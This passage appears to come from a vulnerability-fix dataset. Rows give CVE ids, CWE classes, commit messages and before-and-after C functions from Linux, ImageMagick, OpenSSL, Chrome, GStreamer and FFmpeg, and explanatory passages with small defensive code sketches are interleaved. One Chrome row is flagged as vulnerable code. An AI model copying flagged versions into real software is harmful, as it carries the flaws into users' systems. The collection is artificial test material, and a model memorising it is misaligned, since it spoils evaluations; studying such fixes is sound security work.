EIP is at ieee80211_report_used_skb+0x11/0x3e0 [mac80211]
EAX: e5900da0 EBX: 00000000 ECX: 00000001 EDX: 00000000
ESI: e41d00c0 EDI: e5900da0 EBP: ebe458e4 ESP: ebe458b0
DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068
CR0: 8005003b CR2: 000000b0 CR3: 25a78000 CR4: 000407d0
DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000
DR6: ffff0ff0 DR7: 00000400
Process iperf (pid: 3934, ti=ebe44000 task=e757c0b0 task.ti=ebe44000)
iwlwifi 0000:02:00.0: I iwl_pcie_enqueue_hcmd Sending command LQ_CMD (#4e), seq: 0x0903, 92 bytes at 3[3]:9
Stack:
e403b32c ebe458c4 00200002 00200286 e403b338 ebe458cc c10960bb e5900da0
ff76a6ec ebe458d8 00000000 e41d00c0 e5900da0 ebe458f0 ff6f1b75 e403b210
ebe4598c ff723dc1 00000000 ff76a6ec e597c978 e403b758 00000002 00000002
Call Trace:
[<ff6f1b75>] ieee80211_free_txskb+0x15/0x20 [mac80211]
[<ff723dc1>] invoke_tx_handlers+0x1661/0x1780 [mac80211]
[<ff7248a5>] ieee80211_tx+0x75/0x100 [mac80211]
[<ff7249bf>] ieee80211_xmit+0x8f/0xc0 [mac80211]
[<ff72550e>] ieee80211_subif_start_xmit+0x4fe/0xe20 [mac80211]
[<c149ef70>] dev_hard_start_xmit+0x450/0x950
[<c14b9aa9>] sch_direct_xmit+0xa9/0x250
[<c14b9c9b>] __qdisc_run+0x4b/0x150
[<c149f732>] dev_queue_xmit+0x2c2/0xca0
Cc: stable@vger.kernel.org
Reported-by: Yaara Rozenblum <yaara.rozenblum@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Reviewed-by: Stanislaw Gruszka <sgruszka@redhat.com>
[reword commit log, use a separate lock]
Signed-off-by: Johannes Berg <johannes.berg@intel.com> | void sta_info_init(struct ieee80211_local *local)
{
spin_lock_init(&local->tim_lock);
mutex_init(&local->sta_mtx);
INIT_LIST_HEAD(&local->sta_list);
setup_timer(&local->sta_cleanup, sta_info_cleanup,
(unsigned long)local);
}
| void sta_info_init(struct ieee80211_local *local)
{
spin_lock_init(&local->tim_lock);
mutex_init(&local->sta_mtx);
INIT_LIST_HEAD(&local->sta_list);
setup_timer(&local->sta_cleanup, sta_info_cleanup,
(unsigned long)local);
}
| C | linux | 0 |
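The fix described above serializes the two racing paths, buffering a frame for a sleeping station and draining that buffer on wakeup, behind one per-station lock. The function stored in this record is only the subsystem init; below is a self-contained user-space sketch of the locking pattern, with a pthread mutex standing in for the spinlock the patch adds to the station state:

#include <pthread.h>
#include <stddef.h>
#include <stdio.h>

struct frame { struct frame *next; int id; };

struct sta {
    pthread_mutex_t ps_lock;    /* stands in for the per-station lock the fix adds */
    int sleeping;
    struct frame *buffered;     /* frames queued while the station sleeps */
};

static void transmit_now(struct frame *f) { printf("tx frame %d\n", f->id); }

/* TX path: the "is it asleep?" test and the enqueue happen under ps_lock, so
 * a concurrent wakeup cannot drain the buffer in between and strand the frame. */
static void tx_frame(struct sta *sta, struct frame *f)
{
    pthread_mutex_lock(&sta->ps_lock);
    if (sta->sleeping) {
        f->next = sta->buffered;
        sta->buffered = f;
    } else {
        transmit_now(f);
    }
    pthread_mutex_unlock(&sta->ps_lock);
}

/* Wakeup path: flip the state and drain the buffer under the same lock. */
static void sta_wakeup(struct sta *sta)
{
    pthread_mutex_lock(&sta->ps_lock);
    sta->sleeping = 0;
    while (sta->buffered != NULL) {
        struct frame *f = sta->buffered;
        sta->buffered = f->next;
        transmit_now(f);
    }
    pthread_mutex_unlock(&sta->ps_lock);
}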
CVE-2018-16641 | https://www.cvedetails.com/cve/CVE-2018-16641/ | CWE-772 | https://github.com/ImageMagick/ImageMagick/commit/256825d4eb33dc301496710d15cf5a7ae924088b | 256825d4eb33dc301496710d15cf5a7ae924088b | Fixed possible memory leak reported in #1206 | static int32 TIFFWritePixels(TIFF *tiff,TIFFInfo *tiff_info,ssize_t row,
tsample_t sample,Image *image)
{
int32
status;
register ssize_t
i;
register unsigned char
*p,
*q;
size_t
number_tiles,
tile_width;
ssize_t
bytes_per_pixel,
j,
k,
l;
if (TIFFIsTiled(tiff) == 0)
return(TIFFWriteScanline(tiff,tiff_info->scanline,(uint32) row,sample));
/*
Fill scanlines to tile height.
*/
i=(ssize_t) (row % tiff_info->tile_geometry.height)*TIFFScanlineSize(tiff);
(void) memcpy(tiff_info->scanlines+i,(char *) tiff_info->scanline,
(size_t) TIFFScanlineSize(tiff));
if (((size_t) (row % tiff_info->tile_geometry.height) !=
(tiff_info->tile_geometry.height-1)) &&
(row != (ssize_t) (image->rows-1)))
return(0);
/*
Write tile to TIFF image.
*/
status=0;
bytes_per_pixel=TIFFTileSize(tiff)/(ssize_t) (
tiff_info->tile_geometry.height*tiff_info->tile_geometry.width);
number_tiles=(image->columns+tiff_info->tile_geometry.width)/
tiff_info->tile_geometry.width;
for (i=0; i < (ssize_t) number_tiles; i++)
{
tile_width=(i == (ssize_t) (number_tiles-1)) ? image->columns-(i*
tiff_info->tile_geometry.width) : tiff_info->tile_geometry.width;
for (j=0; j < (ssize_t) ((row % tiff_info->tile_geometry.height)+1); j++)
for (k=0; k < (ssize_t) tile_width; k++)
{
if (bytes_per_pixel == 0)
{
p=tiff_info->scanlines+(j*TIFFScanlineSize(tiff)+(i*
tiff_info->tile_geometry.width+k)/8);
q=tiff_info->pixels+(j*TIFFTileRowSize(tiff)+k/8);
*q++=(*p++);
continue;
}
p=tiff_info->scanlines+(j*TIFFScanlineSize(tiff)+(i*
tiff_info->tile_geometry.width+k)*bytes_per_pixel);
q=tiff_info->pixels+(j*TIFFTileRowSize(tiff)+k*bytes_per_pixel);
for (l=0; l < bytes_per_pixel; l++)
*q++=(*p++);
}
if ((i*tiff_info->tile_geometry.width) != image->columns)
status=TIFFWriteTile(tiff,tiff_info->pixels,(uint32) (i*
tiff_info->tile_geometry.width),(uint32) ((row/
tiff_info->tile_geometry.height)*tiff_info->tile_geometry.height),0,
sample);
if (status < 0)
break;
}
return(status);
}
| static int32 TIFFWritePixels(TIFF *tiff,TIFFInfo *tiff_info,ssize_t row,
tsample_t sample,Image *image)
{
int32
status;
register ssize_t
i;
register unsigned char
*p,
*q;
size_t
number_tiles,
tile_width;
ssize_t
bytes_per_pixel,
j,
k,
l;
if (TIFFIsTiled(tiff) == 0)
return(TIFFWriteScanline(tiff,tiff_info->scanline,(uint32) row,sample));
/*
Fill scanlines to tile height.
*/
i=(ssize_t) (row % tiff_info->tile_geometry.height)*TIFFScanlineSize(tiff);
(void) memcpy(tiff_info->scanlines+i,(char *) tiff_info->scanline,
(size_t) TIFFScanlineSize(tiff));
if (((size_t) (row % tiff_info->tile_geometry.height) !=
(tiff_info->tile_geometry.height-1)) &&
(row != (ssize_t) (image->rows-1)))
return(0);
/*
Write tile to TIFF image.
*/
status=0;
bytes_per_pixel=TIFFTileSize(tiff)/(ssize_t) (
tiff_info->tile_geometry.height*tiff_info->tile_geometry.width);
number_tiles=(image->columns+tiff_info->tile_geometry.width)/
tiff_info->tile_geometry.width;
for (i=0; i < (ssize_t) number_tiles; i++)
{
tile_width=(i == (ssize_t) (number_tiles-1)) ? image->columns-(i*
tiff_info->tile_geometry.width) : tiff_info->tile_geometry.width;
for (j=0; j < (ssize_t) ((row % tiff_info->tile_geometry.height)+1); j++)
for (k=0; k < (ssize_t) tile_width; k++)
{
if (bytes_per_pixel == 0)
{
p=tiff_info->scanlines+(j*TIFFScanlineSize(tiff)+(i*
tiff_info->tile_geometry.width+k)/8);
q=tiff_info->pixels+(j*TIFFTileRowSize(tiff)+k/8);
*q++=(*p++);
continue;
}
p=tiff_info->scanlines+(j*TIFFScanlineSize(tiff)+(i*
tiff_info->tile_geometry.width+k)*bytes_per_pixel);
q=tiff_info->pixels+(j*TIFFTileRowSize(tiff)+k*bytes_per_pixel);
for (l=0; l < bytes_per_pixel; l++)
*q++=(*p++);
}
if ((i*tiff_info->tile_geometry.width) != image->columns)
status=TIFFWriteTile(tiff,tiff_info->pixels,(uint32) (i*
tiff_info->tile_geometry.width),(uint32) ((row/
tiff_info->tile_geometry.height)*tiff_info->tile_geometry.height),0,
sample);
if (status < 0)
break;
}
return(status);
}
| C | ImageMagick | 0 |
CVE-2013-6381 | https://www.cvedetails.com/cve/CVE-2013-6381/ | CWE-119 | https://github.com/torvalds/linux/commit/6fb392b1a63ae36c31f62bc3fc8630b49d602b62 | 6fb392b1a63ae36c31f62bc3fc8630b49d602b62 | qeth: avoid buffer overflow in snmp ioctl
Check user-defined length in snmp ioctl request and allow request
only if it fits into a qeth command buffer.
Signed-off-by: Ursula Braun <ursula.braun@de.ibm.com>
Signed-off-by: Frank Blaschka <frank.blaschka@de.ibm.com>
Reviewed-by: Heiko Carstens <heicars2@linux.vnet.ibm.com>
Reported-by: Nico Golde <nico@ngolde.de>
Reported-by: Fabian Yamaguchi <fabs@goesec.de>
Cc: <stable@vger.kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | int qeth_qdio_clear_card(struct qeth_card *card, int use_halt)
{
int rc = 0;
QETH_CARD_TEXT(card, 3, "qdioclr");
switch (atomic_cmpxchg(&card->qdio.state, QETH_QDIO_ESTABLISHED,
QETH_QDIO_CLEANING)) {
case QETH_QDIO_ESTABLISHED:
if (card->info.type == QETH_CARD_TYPE_IQD)
rc = qdio_shutdown(CARD_DDEV(card),
QDIO_FLAG_CLEANUP_USING_HALT);
else
rc = qdio_shutdown(CARD_DDEV(card),
QDIO_FLAG_CLEANUP_USING_CLEAR);
if (rc)
QETH_CARD_TEXT_(card, 3, "1err%d", rc);
qdio_free(CARD_DDEV(card));
atomic_set(&card->qdio.state, QETH_QDIO_ALLOCATED);
break;
case QETH_QDIO_CLEANING:
return rc;
default:
break;
}
rc = qeth_clear_halt_card(card, use_halt);
if (rc)
QETH_CARD_TEXT_(card, 3, "2err%d", rc);
card->state = CARD_STATE_DOWN;
return rc;
}
| int qeth_qdio_clear_card(struct qeth_card *card, int use_halt)
{
int rc = 0;
QETH_CARD_TEXT(card, 3, "qdioclr");
switch (atomic_cmpxchg(&card->qdio.state, QETH_QDIO_ESTABLISHED,
QETH_QDIO_CLEANING)) {
case QETH_QDIO_ESTABLISHED:
if (card->info.type == QETH_CARD_TYPE_IQD)
rc = qdio_shutdown(CARD_DDEV(card),
QDIO_FLAG_CLEANUP_USING_HALT);
else
rc = qdio_shutdown(CARD_DDEV(card),
QDIO_FLAG_CLEANUP_USING_CLEAR);
if (rc)
QETH_CARD_TEXT_(card, 3, "1err%d", rc);
qdio_free(CARD_DDEV(card));
atomic_set(&card->qdio.state, QETH_QDIO_ALLOCATED);
break;
case QETH_QDIO_CLEANING:
return rc;
default:
break;
}
rc = qeth_clear_halt_card(card, use_halt);
if (rc)
QETH_CARD_TEXT_(card, 3, "2err%d", rc);
card->state = CARD_STATE_DOWN;
return rc;
}
| C | linux | 0 |
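The qeth commit message above is about validating a user-supplied length before it is used to size a copy into a fixed command buffer. A minimal sketch of that pattern in a Linux-style ioctl handler follows; the names (MY_CMD_BUFSIZE, struct my_req_hdr, my_snmp_ioctl) are hypothetical and not taken from the qeth driver.

#include <linux/uaccess.h>
#include <linux/errno.h>
#include <linux/slab.h>

#define MY_CMD_BUFSIZE 4096 /* hypothetical size of the fixed command buffer */

struct my_req_hdr {
	unsigned int data_len; /* payload length claimed by user space */
};

static int my_snmp_ioctl(void __user *udata)
{
	struct my_req_hdr hdr;
	void *buf;

	if (copy_from_user(&hdr, udata, sizeof(hdr)))
		return -EFAULT;

	/* Allow the request only if the claimed payload fits the command buffer. */
	if (hdr.data_len > MY_CMD_BUFSIZE - sizeof(hdr))
		return -EINVAL;

	buf = kmalloc(sizeof(hdr) + hdr.data_len, GFP_KERNEL);
	if (!buf)
		return -ENOMEM;

	if (copy_from_user(buf, udata, sizeof(hdr) + hdr.data_len)) {
		kfree(buf);
		return -EFAULT;
	}

	/* ... build and send the command from buf ... */
	kfree(buf);
	return 0;
}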
CVE-2009-1932 | https://www.cvedetails.com/cve/CVE-2009-1932/ | CWE-189 | https://cgit.freedesktop.org/gstreamer/gst-plugins-good/commit/?id=d9544bcc44adcef769cbdf7f6453e140058a3adc | d9544bcc44adcef769cbdf7f6453e140058a3adc | null | gst_pngdec_base_init (gpointer g_class)
{
GstElementClass *element_class = GST_ELEMENT_CLASS (g_class);
gst_element_class_add_pad_template (element_class,
gst_static_pad_template_get (&gst_pngdec_src_pad_template));
gst_element_class_add_pad_template (element_class,
gst_static_pad_template_get (&gst_pngdec_sink_pad_template));
gst_element_class_set_details (element_class, &gst_pngdec_details);
}
| gst_pngdec_base_init (gpointer g_class)
{
GstElementClass *element_class = GST_ELEMENT_CLASS (g_class);
gst_element_class_add_pad_template (element_class,
gst_static_pad_template_get (&gst_pngdec_src_pad_template));
gst_element_class_add_pad_template (element_class,
gst_static_pad_template_get (&gst_pngdec_sink_pad_template));
gst_element_class_set_details (element_class, &gst_pngdec_details);
}
| C | gstreamer | 0 |
CVE-2014-8275 | https://www.cvedetails.com/cve/CVE-2014-8275/ | CWE-310 | https://github.com/openssl/openssl/commit/684400ce192dac51df3d3e92b61830a6ef90be3e | 684400ce192dac51df3d3e92b61830a6ef90be3e | Fix various certificate fingerprint issues.
By using non-DER or invalid encodings outside the signed portion of a
certificate the fingerprint can be changed without breaking the signature.
Although no details of the signed portion of the certificate can be changed
this can cause problems with some applications: e.g. those using the
certificate fingerprint for blacklists.
1. Reject signatures with non zero unused bits.
If the BIT STRING containing the signature has non zero unused bits reject
the signature. All current signature algorithms require zero unused bits.
2. Check certificate algorithm consistency.
Check the AlgorithmIdentifier inside TBS matches the one in the
certificate signature. NB: this will result in signature failure
errors for some broken certificates.
3. Check DSA/ECDSA signatures use DER.
Reencode DSA/ECDSA signatures and compare with the original received
signature. Return an error if there is a mismatch.
This will reject various cases including garbage after signature
(thanks to Antti Karjalainen and Tuomo Untinen from the Codenomicon CROSS
program for discovering this case) and use of BER or invalid ASN.1 INTEGERs
(negative or with leading zeroes).
CVE-2014-8275
Reviewed-by: Emilia Käsper <emilia@openssl.org> | int i2d_RSAPublicKey_fp(FILE *fp, RSA *rsa)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(RSAPublicKey), fp, rsa);
}
| int i2d_RSAPublicKey_fp(FILE *fp, RSA *rsa)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(RSAPublicKey), fp, rsa);
}
| C | openssl | 0 |
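Item 3 of the commit message above (re-encode DSA/ECDSA signatures and compare them with the received bytes) can be sketched with the public OpenSSL ECDSA_SIG encode/decode helpers. This is an illustrative sketch of the idea under minimal error handling, not the actual OpenSSL patch.

#include <string.h>
#include <openssl/ecdsa.h>
#include <openssl/crypto.h>

/* Return 1 if sig/siglen is a strictly DER-encoded ECDSA signature, 0 otherwise. */
static int ecdsa_sig_is_der(const unsigned char *sig, int siglen)
{
	const unsigned char *p = sig;
	unsigned char *der = NULL;
	ECDSA_SIG *s;
	int derlen, ok = 0;

	s = d2i_ECDSA_SIG(NULL, &p, siglen);
	if (s == NULL)
		return 0;

	/* Re-encode and require an exact byte-for-byte match with the input;
	 * this rejects trailing garbage, BER encodings and bad INTEGERs. */
	derlen = i2d_ECDSA_SIG(s, &der);
	if (derlen > 0 && derlen == siglen && memcmp(sig, der, siglen) == 0)
		ok = 1;

	OPENSSL_free(der);
	ECDSA_SIG_free(s);
	return ok;
}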
CVE-2011-2839 | https://www.cvedetails.com/cve/CVE-2011-2839/ | CWE-20 | https://github.com/chromium/chromium/commit/c63f2b7fe4fe2977f858a8e36d5f48db17eff2e7 | c63f2b7fe4fe2977f858a8e36d5f48db17eff2e7 | Extend TTS extension API to support richer events returned from the engine
to the client. Previously we just had a completed event; this adds start,
word boundary, sentence boundary, and marker boundary. In addition,
interrupted and canceled, which were previously errors, now become events.
Mac and Windows implementations extended to support as many of these events
as possible.
BUG=67713
BUG=70198
BUG=75106
BUG=83404
TEST=Updates all TTS API tests to be event-based, and adds new tests.
Review URL: http://codereview.chromium.org/6792014
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@91665 0039d316-1c4b-4281-b951-d872f2087c98 | static v8::Handle<v8::Value> GetNextRequestId(const v8::Arguments& args) {
static int next_request_id = 0;
return v8::Integer::New(next_request_id++);
}
| static v8::Handle<v8::Value> GetNextRequestId(const v8::Arguments& args) {
static int next_request_id = 0;
return v8::Integer::New(next_request_id++);
}
| C | Chrome | 0 |
CVE-2016-9446 | https://www.cvedetails.com/cve/CVE-2016-9446/ | CWE-200 | https://cgit.freedesktop.org/gstreamer/gst-plugins-bad/commit/gst/vmnc/vmncdec.c?id=4cb1bcf1422bbcd79c0f683edb7ee85e3f7a31fe | 4cb1bcf1422bbcd79c0f683edb7ee85e3f7a31fe | null | gst_vmnc_dec_class_init (GstVMncDecClass * klass)
{
GstElementClass *gstelement_class = GST_ELEMENT_CLASS (klass);
GstVideoDecoderClass *decoder_class = GST_VIDEO_DECODER_CLASS (klass);
decoder_class->start = gst_vmnc_dec_reset;
decoder_class->stop = gst_vmnc_dec_reset;
decoder_class->parse = gst_vmnc_dec_parse;
decoder_class->handle_frame = gst_vmnc_dec_handle_frame;
decoder_class->set_format = gst_vmnc_dec_set_format;
decoder_class->sink_event = gst_vmnc_dec_sink_event;
gst_element_class_add_static_pad_template (gstelement_class,
&vmnc_dec_src_factory);
gst_element_class_add_static_pad_template (gstelement_class,
&vmnc_dec_sink_factory);
gst_element_class_set_static_metadata (gstelement_class, "VMnc video decoder",
"Codec/Decoder/Video", "Decode VmWare video to raw (RGB) video",
"Michael Smith <msmith@xiph.org>");
GST_DEBUG_CATEGORY_INIT (vmnc_debug, "vmncdec", 0, "VMnc decoder");
}
| gst_vmnc_dec_class_init (GstVMncDecClass * klass)
{
GstElementClass *gstelement_class = GST_ELEMENT_CLASS (klass);
GstVideoDecoderClass *decoder_class = GST_VIDEO_DECODER_CLASS (klass);
decoder_class->start = gst_vmnc_dec_reset;
decoder_class->stop = gst_vmnc_dec_reset;
decoder_class->parse = gst_vmnc_dec_parse;
decoder_class->handle_frame = gst_vmnc_dec_handle_frame;
decoder_class->set_format = gst_vmnc_dec_set_format;
decoder_class->sink_event = gst_vmnc_dec_sink_event;
gst_element_class_add_static_pad_template (gstelement_class,
&vmnc_dec_src_factory);
gst_element_class_add_static_pad_template (gstelement_class,
&vmnc_dec_sink_factory);
gst_element_class_set_static_metadata (gstelement_class, "VMnc video decoder",
"Codec/Decoder/Video", "Decode VmWare video to raw (RGB) video",
"Michael Smith <msmith@xiph.org>");
GST_DEBUG_CATEGORY_INIT (vmnc_debug, "vmncdec", 0, "VMnc decoder");
}
| C | gstreamer | 0 |
CVE-2018-6094 | https://www.cvedetails.com/cve/CVE-2018-6094/ | CWE-119 | https://github.com/chromium/chromium/commit/0749ec24fae74ec32d0567eef0e5ec43c84dbcb9 | 0749ec24fae74ec32d0567eef0e5ec43c84dbcb9 | Call HeapObjectHeader::checkHeader solely for its side-effect.
This requires changing its signature. This is a preliminary stage to making it
private.
BUG=633030
Review-Url: https://codereview.chromium.org/2698673003
Cr-Commit-Position: refs/heads/master@{#460489} | void assertObjectHasGCInfo(const void* payload, size_t gcInfoIndex) {
HeapObjectHeader::fromPayload(payload)->checkHeader();
#if !defined(COMPONENT_BUILD)
ASSERT(HeapObjectHeader::fromPayload(payload)->gcInfoIndex() == gcInfoIndex);
#endif
}
| void assertObjectHasGCInfo(const void* payload, size_t gcInfoIndex) {
ASSERT(HeapObjectHeader::fromPayload(payload)->checkHeader());
#if !defined(COMPONENT_BUILD)
ASSERT(HeapObjectHeader::fromPayload(payload)->gcInfoIndex() == gcInfoIndex);
#endif
}
| C | Chrome | 1 |
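The diff in the record above moves a call out of an ASSERT so it still executes in release builds, where the assertion macro compiles to nothing. The same pitfall exists with the standard C assert(); a hypothetical sketch (check_header is a made-up function standing in for a call with a required side effect):

#include <assert.h>

/* Validates object state and has a required side effect; hypothetical. */
int check_header(void *obj);

void use_object_bad(void *obj)
{
	/* Bug: when NDEBUG is defined, assert() expands to nothing and
	 * check_header() is never called at all. */
	assert(check_header(obj));
}

void use_object_good(void *obj)
{
	/* Call unconditionally for its side effect; assert on the result
	 * separately if a debug-only sanity check is still wanted. */
	int ok = check_header(obj);
	assert(ok);
	(void)ok; /* silence unused-variable warning in NDEBUG builds */
}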
CVE-2013-0886 | https://www.cvedetails.com/cve/CVE-2013-0886/ | null | https://github.com/chromium/chromium/commit/18d67244984a574ba2dd8779faabc0e3e34f4b76 | 18d67244984a574ba2dd8779faabc0e3e34f4b76 | Implement TextureImageTransportSurface using texture mailbox
This has a couple of advantages:
- allow tearing down and recreating the UI parent context without
losing the renderer contexts
- do not require a context to be able to generate textures when
creating the GLSurfaceHandle
- clearer ownership semantics that potentially allows for more
robust and easier lost context handling/thumbnailing/etc., since a texture is at
any given time owned by either: UI parent, mailbox, or
TextureImageTransportSurface
- simplify frontbuffer protection logic;
the frontbuffer textures are now owned by RWHV where they are refcounted
The TextureImageTransportSurface informs RenderWidgetHostView of the
mailbox names for the front- and backbuffer textures by
associating them with a surface_handle (1 or 2) in the AcceleratedSurfaceNew message.
During SwapBuffers() or PostSubBuffer() cycles, it then uses
produceTextureCHROMIUM() and consumeTextureCHROMIUM()
to transfer ownership between renderer and browser compositor.
RWHV sends back the surface_handle of the buffer being returned with the Swap ACK
(or 0 if no buffer is being returned in which case TextureImageTransportSurface will
allocate a new texture - note that this could be used to
simply keep textures for thumbnailing).
BUG=154815,139616
TBR=sky@chromium.org
Review URL: https://chromiumcodereview.appspot.com/11194042
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@171569 0039d316-1c4b-4281-b951-d872f2087c98 | bool GpuProcessHost::LaunchGpuProcess(const std::string& channel_id) {
if (!(gpu_enabled_ &&
GpuDataManagerImpl::GetInstance()->ShouldUseSoftwareRendering()) &&
!hardware_gpu_enabled_) {
SendOutstandingReplies();
return false;
}
const CommandLine& browser_command_line = *CommandLine::ForCurrentProcess();
CommandLine::StringType gpu_launcher =
browser_command_line.GetSwitchValueNative(switches::kGpuLauncher);
#if defined(OS_LINUX)
int child_flags = gpu_launcher.empty() ? ChildProcessHost::CHILD_ALLOW_SELF :
ChildProcessHost::CHILD_NORMAL;
#else
int child_flags = ChildProcessHost::CHILD_NORMAL;
#endif
FilePath exe_path = ChildProcessHost::GetChildPath(child_flags);
if (exe_path.empty())
return false;
CommandLine* cmd_line = new CommandLine(exe_path);
cmd_line->AppendSwitchASCII(switches::kProcessType, switches::kGpuProcess);
cmd_line->AppendSwitchASCII(switches::kProcessChannelID, channel_id);
if (kind_ == GPU_PROCESS_KIND_UNSANDBOXED)
cmd_line->AppendSwitch(switches::kDisableGpuSandbox);
static const char* const kSwitchNames[] = {
switches::kDisableBreakpad,
switches::kDisableGLMultisampling,
switches::kDisableGpuSandbox,
switches::kReduceGpuSandbox,
switches::kDisableSeccompFilterSandbox,
switches::kEnableGpuSandbox,
switches::kDisableGpuVsync,
switches::kDisableGpuWatchdog,
switches::kDisableImageTransportSurface,
switches::kDisableAcceleratedVideoDecode,
switches::kDisableLogging,
switches::kEnableGPUServiceLogging,
switches::kEnableLogging,
#if defined(OS_MACOSX)
switches::kEnableSandboxLogging,
#endif
switches::kGpuNoContextLost,
switches::kGpuStartupDialog,
switches::kGpuSwitching,
switches::kLoggingLevel,
switches::kNoSandbox,
switches::kTestGLLib,
switches::kTraceStartup,
switches::kV,
switches::kVModule,
switches::kEnableUIReleaseFrontSurface,
#if defined(USE_AURA)
switches::kUIPrioritizeInGpuProcess,
#endif
switches::kCrashOnGpuHang,
switches::kEnableVirtualGLContexts,
};
cmd_line->CopySwitchesFrom(browser_command_line, kSwitchNames,
arraysize(kSwitchNames));
cmd_line->CopySwitchesFrom(
browser_command_line, switches::kGpuSwitches, switches::kNumGpuSwitches);
GetContentClient()->browser()->AppendExtraCommandLineSwitches(
cmd_line, process_->GetData().id);
GpuDataManagerImpl::GetInstance()->AppendGpuCommandLine(cmd_line);
if (cmd_line->HasSwitch(switches::kUseGL))
software_rendering_ =
(cmd_line->GetSwitchValueASCII(switches::kUseGL) == "swiftshader");
UMA_HISTOGRAM_BOOLEAN("GPU.GPUProcessSoftwareRendering", software_rendering_);
#if defined(OS_WIN)
cmd_line->AppendSwitchASCII("ignored", " --type=renderer ");
#endif
if (!gpu_launcher.empty())
cmd_line->PrependWrapper(gpu_launcher);
process_->Launch(
#if defined(OS_WIN)
FilePath(),
#elif defined(OS_POSIX)
false, // Never use the zygote (GPU plugin can't be sandboxed).
base::EnvironmentVector(),
#endif
cmd_line);
process_launched_ = true;
UMA_HISTOGRAM_ENUMERATION("GPU.GPUProcessLifetimeEvents",
LAUNCHED, GPU_PROCESS_LIFETIME_EVENT_MAX);
return true;
}
| bool GpuProcessHost::LaunchGpuProcess(const std::string& channel_id) {
if (!(gpu_enabled_ &&
GpuDataManagerImpl::GetInstance()->ShouldUseSoftwareRendering()) &&
!hardware_gpu_enabled_) {
SendOutstandingReplies();
return false;
}
const CommandLine& browser_command_line = *CommandLine::ForCurrentProcess();
CommandLine::StringType gpu_launcher =
browser_command_line.GetSwitchValueNative(switches::kGpuLauncher);
#if defined(OS_LINUX)
int child_flags = gpu_launcher.empty() ? ChildProcessHost::CHILD_ALLOW_SELF :
ChildProcessHost::CHILD_NORMAL;
#else
int child_flags = ChildProcessHost::CHILD_NORMAL;
#endif
FilePath exe_path = ChildProcessHost::GetChildPath(child_flags);
if (exe_path.empty())
return false;
CommandLine* cmd_line = new CommandLine(exe_path);
cmd_line->AppendSwitchASCII(switches::kProcessType, switches::kGpuProcess);
cmd_line->AppendSwitchASCII(switches::kProcessChannelID, channel_id);
if (kind_ == GPU_PROCESS_KIND_UNSANDBOXED)
cmd_line->AppendSwitch(switches::kDisableGpuSandbox);
static const char* const kSwitchNames[] = {
switches::kDisableBreakpad,
switches::kDisableGLMultisampling,
switches::kDisableGpuSandbox,
switches::kReduceGpuSandbox,
switches::kDisableSeccompFilterSandbox,
switches::kEnableGpuSandbox,
switches::kDisableGpuVsync,
switches::kDisableGpuWatchdog,
switches::kDisableImageTransportSurface,
switches::kDisableAcceleratedVideoDecode,
switches::kDisableLogging,
switches::kEnableGPUServiceLogging,
switches::kEnableLogging,
#if defined(OS_MACOSX)
switches::kEnableSandboxLogging,
#endif
switches::kGpuNoContextLost,
switches::kGpuStartupDialog,
switches::kGpuSwitching,
switches::kLoggingLevel,
switches::kNoSandbox,
switches::kTestGLLib,
switches::kTraceStartup,
switches::kV,
switches::kVModule,
switches::kEnableUIReleaseFrontSurface,
#if defined(USE_AURA)
switches::kUIPrioritizeInGpuProcess,
#endif
switches::kCrashOnGpuHang,
switches::kEnableVirtualGLContexts,
};
cmd_line->CopySwitchesFrom(browser_command_line, kSwitchNames,
arraysize(kSwitchNames));
cmd_line->CopySwitchesFrom(
browser_command_line, switches::kGpuSwitches, switches::kNumGpuSwitches);
GetContentClient()->browser()->AppendExtraCommandLineSwitches(
cmd_line, process_->GetData().id);
GpuDataManagerImpl::GetInstance()->AppendGpuCommandLine(cmd_line);
if (cmd_line->HasSwitch(switches::kUseGL))
software_rendering_ =
(cmd_line->GetSwitchValueASCII(switches::kUseGL) == "swiftshader");
UMA_HISTOGRAM_BOOLEAN("GPU.GPUProcessSoftwareRendering", software_rendering_);
#if defined(OS_WIN)
cmd_line->AppendSwitchASCII("ignored", " --type=renderer ");
#endif
if (!gpu_launcher.empty())
cmd_line->PrependWrapper(gpu_launcher);
process_->Launch(
#if defined(OS_WIN)
FilePath(),
#elif defined(OS_POSIX)
false, // Never use the zygote (GPU plugin can't be sandboxed).
base::EnvironmentVector(),
#endif
cmd_line);
process_launched_ = true;
UMA_HISTOGRAM_ENUMERATION("GPU.GPUProcessLifetimeEvents",
LAUNCHED, GPU_PROCESS_LIFETIME_EVENT_MAX);
return true;
}
| C | Chrome | 0 |
CVE-2017-11719 | https://www.cvedetails.com/cve/CVE-2017-11719/ | CWE-125 | https://github.com/FFmpeg/FFmpeg/commit/296debd213bd6dce7647cedd34eb64e5b94cdc92 | 296debd213bd6dce7647cedd34eb64e5b94cdc92 | avcodec/dnxhddec: Move mb height check out of non hr branch
Fixes: out of array access
Fixes: poc.dnxhd
Found-by: Bingchang, Liu@VARAS of IIE
Signed-off-by: Michael Niedermayer <michael@niedermayer.cc> | static int dnxhd_decode_dct_block_10_444(const DNXHDContext *ctx,
RowContext *row, int n)
{
return dnxhd_decode_dct_block(ctx, row, n, 6, 32, 6, 0);
}
| static int dnxhd_decode_dct_block_10_444(const DNXHDContext *ctx,
RowContext *row, int n)
{
return dnxhd_decode_dct_block(ctx, row, n, 6, 32, 6, 0);
}
| C | FFmpeg | 0 |
CVE-2016-7910 | https://www.cvedetails.com/cve/CVE-2016-7910/ | CWE-416 | https://github.com/torvalds/linux/commit/77da160530dd1dc94f6ae15a981f24e5f0021e84 | 77da160530dd1dc94f6ae15a981f24e5f0021e84 | block: fix use-after-free in seq file
I got a KASAN report of use-after-free:
==================================================================
BUG: KASAN: use-after-free in klist_iter_exit+0x61/0x70 at addr ffff8800b6581508
Read of size 8 by task trinity-c1/315
=============================================================================
BUG kmalloc-32 (Not tainted): kasan: bad access detected
-----------------------------------------------------------------------------
Disabling lock debugging due to kernel taint
INFO: Allocated in disk_seqf_start+0x66/0x110 age=144 cpu=1 pid=315
___slab_alloc+0x4f1/0x520
__slab_alloc.isra.58+0x56/0x80
kmem_cache_alloc_trace+0x260/0x2a0
disk_seqf_start+0x66/0x110
traverse+0x176/0x860
seq_read+0x7e3/0x11a0
